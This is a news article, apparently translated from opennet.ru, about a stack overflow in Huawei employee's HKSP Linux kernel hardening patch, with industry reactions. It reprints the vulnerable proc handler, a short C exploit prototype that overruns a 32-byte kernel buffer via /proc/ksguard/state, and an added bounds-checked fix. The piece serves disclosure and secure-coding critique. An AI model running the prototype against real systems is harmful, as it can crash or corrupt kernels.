Vulnerability in a patch proposed by a Huawei employee to protect the Linux kernel

Developers of the Grsecurity project have drawn attention to a trivially exploitable vulnerability in the HKSP (Huawei Kernel Self Protection) patch set, published a few days ago with the aim of improving the security of the Linux kernel. The situation is reminiscent of the case with Samsung, in which an attempt to harden the system led to a new vulnerability and made it easier to compromise devices.

The HKSP patch was published by a Huawei employee, with a mention of Huawei in the GitHub profile and the word Huawei in the project name (HKSP - Huawei Kernel Self Protection). At the same time, Huawei representatives denied any connection between the HKSP project and the company, stating that the code was developed by the employee on his own initiative, is not a Huawei project and is not used in the company's products. After the vulnerabilities were discovered, a note was retroactively added to the HKSP GitHub page stating that the project was created "in my spare time" for research purposes.

HKSP includes changes such as randomization of offsets in the cred structure, protection against attacks on the identifier namespace (pid namespace), separation of the process stack from the mmap area, detection of double calls to the kfree function, blocking of leaks through the /proc pseudo-FS (/proc/{modules, keys, key-users}, /proc/sys/kernel/* and /proc/sys/vm/mmap_min_addr, /proc/kallsyms), improved user-space address randomization, additional ptrace protection, strengthened SMAP and SMEP protection, the ability to prohibit sending data through raw sockets, blocking of invalid addresses in UDP sockets, and integrity checking of running processes. It also includes the Ksguard kernel module, which is aimed at detecting attempts to install typical rootkits.

Greg Kroah-Hartman, who is responsible for maintaining the stable branch of the Linux kernel, called the patch worthy of attention and asked the author to split the monolithic patch into parts to simplify review and inclusion in the mainline kernel. Kees Cook, head of the project for promoting active protection technologies in the Linux kernel, also responded positively to the patch and, among the problems, pointed to the binding to the x86 architecture and the notification-only nature of many modes, which merely log information about a problem but make no attempt to block it.

A study of the patch by the Grsecurity developers revealed many errors and weaknesses in the code, and also showed the absence of a threat model that would allow the project's capabilities to be judged adequately. To illustrate that the code was written without secure programming practices, they gave the example of a trivial vulnerability in the handler of the file /proc/ksguard/state, which is created with mode 0777, meaning that everyone has write access. The ksg_state_write function, used to parse commands written to /proc/ksguard/state, allocates a tmp[32] buffer into which data is copied using the size of the passed operand, without taking the size of the target buffer into account and without checking the length parameter against it. Thus, to overwrite part of the kernel stack, an attacker only has to write a specially crafted string to /proc/ksguard/state.

static ssize_t ksg_state_write(struct file *file, const char __user *buf,
                               size_t len, loff_t *offset)
{
        u64 value;
        char tmp[32];
        size_t n = 0;

        /* len is user-controlled and is never compared with sizeof(tmp) */
        if (copy_from_user(tmp, buf, len))
                return -1;

        value = simple_strtoul(tmp, '\0', 10);
        ...

Exploit prototype:

#include <fcntl.h>
#include <unistd.h>

int main(void)
{
        char buf[4096] = { 0 };   /* 4096 bytes, far larger than the 32-byte tmp buffer */
        int fd = open("/proc/ksguard/state", O_WRONLY);
        if (fd >= 0) {
                write(fd, buf, sizeof(buf));
                close(fd);
        }
        return 0;
}
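A bounds-checked version of the handler, as an added example that is not HKSP's code: it models ksg_state_write in user space (memcpy and strtoul stand in for copy_from_user and simple_strtoul; the name ksg_state_write_fixed is hypothetical) and rejects any write that cannot fit in the 32-byte buffer before copying a single byte.

```c
/* Added example (not HKSP code): user-space model of a bounds-checked
 * replacement for ksg_state_write.  Kernel-only pieces are stubbed:
 * copy_from_user() becomes memcpy(), simple_strtoul() becomes strtoul().
 * In a real module the idiomatic route is kstrtoul_from_user(), and the
 * proc entry should be created with mode 0600 rather than 0777. */
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>

#define KSG_TMP_SIZE 32   /* same 32-byte stack buffer as the original handler */

/* Mirrors the original handler minus the struct file / loff_t arguments.
 * Returns the number of bytes consumed, or a negative errno value. */
ssize_t ksg_state_write_fixed(const char *buf, size_t len, unsigned long *value)
{
        char tmp[KSG_TMP_SIZE];
        char *end;

        /* The missing check: the input must fit together with a terminating
         * NUL.  The original copied 'len' bytes into tmp[32] unconditionally. */
        if (len == 0 || len >= sizeof(tmp))
                return -EINVAL;

        memcpy(tmp, buf, len);   /* stands in for copy_from_user(tmp, buf, len) */
        tmp[len] = '\0';         /* the original never terminated the buffer */

        /* Strict parse: digits, optionally followed by one newline, and
         * nothing else, so "12abc" or an empty command is rejected instead
         * of silently becoming 12 or 0. */
        errno = 0;
        *value = strtoul(tmp, &end, 10);
        if (errno != 0 || end == tmp)
                return -EINVAL;
        if (*end == '\n')
                end++;
        if (*end != '\0')
                return -EINVAL;

        return (ssize_t)len;
}
```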

Source: opennet.ru
